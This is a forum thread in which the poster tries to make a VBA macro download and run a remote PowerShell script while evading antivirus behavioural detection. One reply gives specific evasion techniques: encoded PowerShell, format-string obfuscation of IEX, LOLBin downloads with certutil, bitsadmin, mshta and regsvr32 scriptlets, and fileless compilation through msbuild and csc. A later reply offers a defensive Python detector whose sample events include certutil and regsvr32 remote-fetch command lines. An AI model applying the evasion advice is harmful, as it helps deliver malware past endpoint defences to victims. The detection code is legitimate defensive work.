VBA Macros in 2025 : hacking

Hey everyone, these last couple of days I've been working on VBA macros. As you all know, they got hit hard so I'm trying to make 'em work again. Recent attacks by APTs showed that they used a tool called MacroPack Pro (No way I'm buying).
You can find this information using your favourite search engine.

So far, I managed to call wscript.shell via GetObject followed by CLSID. The id is also obfuscated so we good on that part. (Tested and works with AV off).

My goal is to read and run a remote script, nothing else for now. But the problem is every time I add powershell to read and run a remote script (IEX) it gets caught by behavioural. I tried concatenating, argument obfuscation, making it unreadable yet no luck.

I would appreciate it if anyone with experience on the topic can shed some light here, feel free to DM as well.

Cheers.
/u/DarkDev77 🍼
1 points
5 days ago
Your problem with PowerShell (especially IEX) is due to the behavior analysis of AV/EDR systems. PowerShell is considered a so-called LOLBin (Living Off the Land Binary) – a legitimate tool with high potential for abuse. That's why security solutions are very sensitive to typical attack patterns.
What you can do:

🔹 Better camouflage PowerShell:
Base64-encode your command with -EncodedCommand.
Use string splitting or reversal: e.g. ("{2}{1}{0}" -f 'X','E','I').

🔹 Other Windows tools (LOLbins) instead of PowerShell:
These tools are often less conspicuous because they are used in everyday admin tasks:
certutil.exe: File download via -urlcache -split -f.
bitsadmin.exe: File transfer in the background.
mshta.exe: Executes .hta files with embedded scripts.
regsvr32.exe: Loads remote scripts via scrobj.dll (/i:http://...).
wscript.exe / cscript.exe: Executes VBS or JS, even from NTFS ADS.

🔹 File-less techniques (advanced):
Save code in the Windows registry and execute it from there.
Compile remote code via msbuild.exe or csc.exe in the RAM and start it without a file on disk.

If you need further assistance, please feel free to send me a DM. This topic is not entirely straightforward.
/u/Security101 P
1 points
4 days ago
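The reply above is exactly the behaviour set a defender wants telemetry on: an Office process spawning one of the listed LOLBins, encoded PowerShell, certutil download syntax, or regsvr32 loading scrobj.dll from a URL. The following is an added example written from the detection side, not code from anyone in this thread. It walks Sysmon-style process-creation events (the field names ParentImage, Image, CommandLine and ProcessId are an assumption about the log schema) and returns the reasons each event looks like Office-to-LOLBin execution. All sample events are constructed, with placeholder hosts and a harmless base64 string.

```python
"""Flag Office-spawned LOLBin activity in process-creation events.

Sample events are constructed and mimic Sysmon Event ID 1 fields
(ParentImage, Image, CommandLine, ProcessId); the schema is an assumption.
"""
import re

# Office hosts that should rarely, if ever, spawn the binaries below
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# LOLBins enumerated in the reply, plus msbuild/csc from its fileless section
LOLBINS = {
    "powershell.exe", "pwsh.exe", "certutil.exe", "bitsadmin.exe",
    "mshta.exe", "regsvr32.exe", "wscript.exe", "cscript.exe",
    "msbuild.exe", "csc.exe",
}

# Command-line indicators the thread discusses; checked case-insensitively
CMDLINE_INDICATORS = [
    ("encoded powershell", re.compile(r"\s-(e|ec|en|enc|encodedcommand)\b", re.I)),
    ("download cradle (IEX)", re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    ("certutil urlcache download", re.compile(r"-urlcache\b.*-split\b", re.I)),
    ("regsvr32 scrobj remote", re.compile(r"scrobj\.dll|/i:https?://", re.I)),
    ("format-string obfuscation", re.compile(r"\{\d\}\{\d\}.*\s-f\s", re.I)),
]


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(event: dict) -> list:
    """Return reasons this event looks like Office-to-LOLBin execution.

    An empty list means nothing was flagged. Command-line indicators only
    count when the image is a LOLBin or the parent is an Office process,
    which keeps unrelated processes from generating noise.
    """
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    office_parent = parent in OFFICE_PARENTS
    if not (office_parent or image in LOLBINS):
        return []
    reasons = []
    if office_parent and image in LOLBINS:
        reasons.append(f"office parent {parent} spawned {image}")
    for label, pattern in CMDLINE_INDICATORS:
        if pattern.search(cmdline):
            reasons.append(label)
    return reasons


def triage(events: list) -> list:
    """Score every flagged event: 'high' when an Office parent spawned a
    LOLBin, 'medium' when only command-line indicators fired."""
    findings = []
    for ev in events:
        reasons = analyze_event(ev)
        if not reasons:
            continue
        severity = "high" if reasons[0].startswith("office parent") else "medium"
        findings.append({"ProcessId": ev.get("ProcessId"),
                         "severity": severity, "reasons": reasons})
    return findings


# Constructed sample events (placeholder hosts; base64 decodes to "AAA")
SAMPLE_EVENTS = [
    {"ProcessId": 4101, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc QQBBAEEA"},
    {"ProcessId": 4102, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
    {"ProcessId": 4103, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://example.invalid/p.txt p.txt"},
    {"ProcessId": 4104, "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
    {"ProcessId": 4105, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32.exe /s /u /i:http://example.invalid/a.sct scrobj.dll"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

The parent-process check carries the weight here: the reply is right that each of these binaries is mundane on its own, so the detection keys on the Office-parent relationship first and treats command-line patterns as corroboration rather than as the sole trigger.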
You can send me a DM, in case you need any assistance.
/u/makeanotes
1 points
4 days ago
VBA macros are no longer a thing on updated systems in 2025. Microsoft killed macros last year? or the year before
/u/D4vyBr0nz 📢 🍼
1 points
3 days ago
I literally mentioned recent attacks, it still works.